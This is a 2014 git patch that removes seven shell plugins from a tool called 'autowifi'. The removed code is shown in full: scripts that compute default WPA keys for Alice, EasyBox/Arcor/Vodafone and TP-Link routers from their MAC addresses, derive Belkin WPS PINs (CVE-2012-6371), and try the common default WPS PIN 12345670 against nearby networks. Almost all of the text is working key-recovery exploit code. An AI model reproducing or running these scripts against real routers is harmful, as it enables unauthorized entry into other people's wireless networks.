From dbaee4aae713410b813f871bb8e8594a9d84f814 Mon Sep 17 00:00:00 2001 From: makefu Date: Sat, 20 Dec 2014 22:08:23 +0100 Subject: autowifi-merged files to recon/autowifi --- usr/lib/autowifi/plugins/00profile | 11 ---------- usr/lib/autowifi/plugins/01open | 6 ----- usr/lib/autowifi/plugins/02alice | 20 ----------------- usr/lib/autowifi/plugins/02easybox | 37 ------------------------------- usr/lib/autowifi/plugins/02tplink | 17 --------------- usr/lib/autowifi/plugins/11belkin_wps | 40 ---------------------------------- usr/lib/autowifi/plugins/30default_wps | 18 --------------- 7 files changed, 149 deletions(-) delete mode 100755 usr/lib/autowifi/plugins/00profile delete mode 100755 usr/lib/autowifi/plugins/01open delete mode 100755 usr/lib/autowifi/plugins/02alice delete mode 100755 usr/lib/autowifi/plugins/02easybox delete mode 100755 usr/lib/autowifi/plugins/02tplink delete mode 100755 usr/lib/autowifi/plugins/11belkin_wps delete mode 100755 usr/lib/autowifi/plugins/30default_wps (limited to 'usr/lib/autowifi/plugins') diff --git a/usr/lib/autowifi/plugins/00profile b/usr/lib/autowifi/plugins/00profile deleted file mode 100755 index d7fb9c75..00000000 --- a/usr/lib/autowifi/plugins/00profile +++ /dev/null @@ -1,11 +0,0 @@ -#!/bin/sh -#ESSID MAC CHANNEL ENCRYPTION WPA WPA2 -# ENV: -# root (default: /) -root=${root:-/} -cat $root/etc/autowifi/wifi_keys 2>/dev/null | (while IFS='|' read SSID MAC BANDWIDTH KEY; do - if [ "$1" == "$SSID" -a "$2" == "$MAC" ]; then - echo $KEY - exit 0 - fi -done; exit 1) diff --git a/usr/lib/autowifi/plugins/01open b/usr/lib/autowifi/plugins/01open deleted file mode 100755 index 881f47ea..00000000 --- a/usr/lib/autowifi/plugins/01open +++ /dev/null @@ -1,6 +0,0 @@ -#!/bin/sh -#ESSID MAC CHANNEL ENCRYPTION -if [ "$4" == "[ESS]" ]; then - exit 0 -fi -exit 1 diff --git a/usr/lib/autowifi/plugins/02alice b/usr/lib/autowifi/plugins/02alice deleted file mode 100755 index 1b4533a4..00000000 --- a/usr/lib/autowifi/plugins/02alice +++ /dev/null @@ -1,20 +0,0 @@ -#!/bin/sh -# Implementation of Alicebox 1121 /Siemens S1621-Z220-A Default Password Algorithm: -# Based on Poc from -# http://www.wardriving-forum.de/forum/f275/standard-wlanpassw%F6rter-von-alice-boxen-70287.html -# -# -# ESSID MAC CHANNEL ENCRYPTION - -cd $(dirname $(readlink -f $0)) -. ../lib/plugin_core - -parse_plugin_args "$@" - -! check_vendor_mac $VENDOR_MAC "00255E" && echo "$VENDOR_MAC not affected" && exit 1 - -# printf always makes string to lower, need that for correct md5sum -ETHMAC=$( printf "%012x" $((0x${MAC}-1)) ) -TMP=$(printf $ETHMAC | md5sum) -printf ${TMP:0:12} | base64 -exit 0 diff --git a/usr/lib/autowifi/plugins/02easybox b/usr/lib/autowifi/plugins/02easybox deleted file mode 100755 index 3d7cb8c1..00000000 --- a/usr/lib/autowifi/plugins/02easybox +++ /dev/null @@ -1,37 +0,0 @@ -#!/bin/sh -#ESSID MAC CHANNEL ENCRYPTION WPA WPA2 - -cd $(dirname $(readlink -f $0)) -. ../lib/plugin_core -parse_plugin_args "$@" - -if ! echo "$ESSID" | egrep -i "(EasyBox-|Arcor-|Vodafone-)" >/dev/null; then - echo "Essid $ESSID is not Default EasyBox|Arcor|Vodafone" - exit 1 -else - - # Fill up to 4 places with zeros, if necessary: - deci=$(printf "%04d" "0x${MAC:8:4}" | sed 's/.*\(....\)/\1/;s/./& /g') - # - # The digits M9 to M12 are just the last digits (9.-12.) of the MAC: - hexi=$(echo ${MAC:8:4} | sed 's/./& /g') - #echo 'M4 (Hex): ' ${hexi[@]} - # K1 = last byte of (d0 + d1 + h2 + h3) - # K2 = last byte of (h0 + h1 + d2 + d3) - c1=$(printf "%d + %d + %d + %d" ${deci:0:1} ${deci:2:1} 0x${hexi:4:1} 0x${hexi:6:1}) - c2=$(printf "%d + %d + %d + %d" 0x${hexi:0:1} 0x${hexi:2:1} ${deci:4:1} ${deci:6:1}) - K1=$((($c1)%16)) - K2=$((($c2)%16)) - #printf "K1: %x\n" $K1 - #printf "K2: %x\n" $K2 - X1=$((K1^${deci:6:1})) - X2=$((K1^${deci:4:1})) - X3=$((K1^${deci:2:1})) - Y1=$((K2^0x${hexi:2:1})) - Y2=$((K2^0x${hexi:4:1})) - Y3=$((K2^0x${hexi:6:1})) - Z1=$((0x${hexi:4:1}^${deci:6:1})) - Z2=$((0x${hexi:6:1}^${deci:4:1})) - Z3=$((K1^K2)) - printf "%x%x%x%x%x%x%x%x%x\n" $X1 $Y1 $Z1 $X2 $Y2 $Z2 $X3 $Y3 $Z3 | tr a-f A-F -fi diff --git a/usr/lib/autowifi/plugins/02tplink b/usr/lib/autowifi/plugins/02tplink deleted file mode 100755 index b2b96f95..00000000 --- a/usr/lib/autowifi/plugins/02tplink +++ /dev/null @@ -1,17 +0,0 @@ -#!/bin/sh -# Implementation of TP-Link default WPA Key -# Based on -# http://www.wardriving-forum.de/forum/f321/ezwlan-android-2-1-a-70045-4.html#post342481 - -cd $(dirname $(readlink -f $0)) -. ../lib/plugin_core - -parse_plugin_args "$@" - -! check_vendor_mac $VENDOR_MAC "F8D111" && echo "$VENDOR_MAC not affected" && exit 1 -! echo $ESSID | egrep -q '^tp' && echo "$ESSID not affected" && exit 1 - - -# printf always makes string to lower, need that for correct md5sum -printf ${MAC:4:12} -exit 0 diff --git a/usr/lib/autowifi/plugins/11belkin_wps b/usr/lib/autowifi/plugins/11belkin_wps deleted file mode 100755 index d4eb8e37..00000000 --- a/usr/lib/autowifi/plugins/11belkin_wps +++ /dev/null @@ -1,40 +0,0 @@ -#!/bin/sh -# thanks to http://ednolo.alumnos.upv.es/?p=1295G -# for the PoC code -# Calculates the default WPS pin of Belkin Routers and returns the WPA key -# -# Implementation of CVE-2012-6371 - -# works : -# Belkin_N+_XXXXXX 00:22:75:XX:XX:XX F5D8235-4 v1000 -# belkin.XXX 00:1C:DF:XX:XX:XX F5D8231-4 v5000 -# belkin.XXX 09:86:3B:XX:XX:XX F9K1104 v1000 - -cd $(dirname $(readlink -f $0)) -. ../lib/plugin_core -. ../lib/wps -parse_plugin_args "$@" - -check_painmode - -! check_vendor_mac "$VENDOR_MAC" 002275 001CDF 09863B && echo "VENDOR MAC $VENDOR_MAC not affected" && exit 1 - -calc_belkin(){ - PRIVATE_MAC=${1} - - p=$((0x$PRIVATE_MAC % 10000000)) - wps_pin_checksum(){ - pin=$1 - accum=0 - while [ $pin -ne 0 ];do - accum=$((accum + (3 * (pin % 10)) )) - pin=$((pin/10)) - accum=$((accum + pin %10 )) - pin=$((pin/10)) - done - echo $(( (10 - accum % 10) % 10)) - } - printf "%07d%d" $p $(wps_pin_checksum $p) - return 0 -} -try_wps_pin $@ $(calc_belkin ${PRIVATE_MAC}) diff --git a/usr/lib/autowifi/plugins/30default_wps b/usr/lib/autowifi/plugins/30default_wps deleted file mode 100755 index 50ad2676..00000000 --- a/usr/lib/autowifi/plugins/30default_wps +++ /dev/null @@ -1,18 +0,0 @@ -#!/bin/sh -# on MANY WPS-enabled devices the pin is 12345670 , so we can give it a shot -# http://www.wotan.cc/?p=75 -cd $(dirname $(readlink -f $0)) -. ../lib/wps -. ../lib/plugin_core - -parse_plugin_args "$@" -check_painmode -DEFAULT_PIN="${DEFAULT_PIN:-12345670}" - -if has_wps "$ENC"; then - echo "trying PIN $DEFAULT_PIN against $ESSID" >&2 - try_wps_pin "$@" $DEFAULT_PIN -else - echo "Network $ESSID not WPS enabled" - exit 1 -fi -- cgit v1.2.3